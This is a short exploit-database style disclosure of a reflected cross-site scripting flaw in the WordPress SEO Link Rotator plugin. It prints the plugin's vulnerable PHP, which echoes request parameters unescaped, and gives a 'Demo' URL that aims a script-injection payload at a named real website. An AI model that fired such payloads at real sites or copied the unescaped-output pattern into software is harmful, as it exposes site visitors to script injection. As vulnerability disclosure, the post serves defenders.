Home / exploits WordPress Seo Link Rotator Cross Site Scripting
Posted on 28 January 2014
###################### # Exploit Title : Wordpress Seo Link Rotator Plugin Cross Site Scripting # Exploit Author : ACC3SS # Vendor Homepage : http://www.seolinkrotator.com # Software Link : http://www.seolinkrotator.com/download/files/seolinkrotator.zip # Date : 2014-01-19 # Tested on : Windows 7 / Mozilla Firefox Web Browser # Discovered by : ACC3SS ###################### # Vulnerability code : <?php $action = $_GET['action']; switch($action){ case "buildLink": $linkURL = $_GET['URL']; $linkTitle = urldecode($_GET['title']); $type = $_GET['type']; ?> <div class="seoLinkRotatorInfo"> <h2>Link To This <?=ucwords($type)?></h2> <p>If you would like to share this <?=$type?> with someone else just copy and paste the HTML into one of your pages:</p> <div class="seoLinkHTMLBox"> <?php echo '<a href="' . $linkURL . '">' . $linkTitle . '<a>'; ?> </div> </div> <?php break; default: echo 'Unkown action'; break; } ?> ###################### # Location : localhost/wp-content/plugins/seolinkrotator/pusher.php?action=buildLink&title=[Xss] ###################### # Demo : # http://www.porterpr.com/wp-content/plugins/seolinkrotator/pusher.php?action=buildLink&title= "/><script>alert(1);</script> ######################
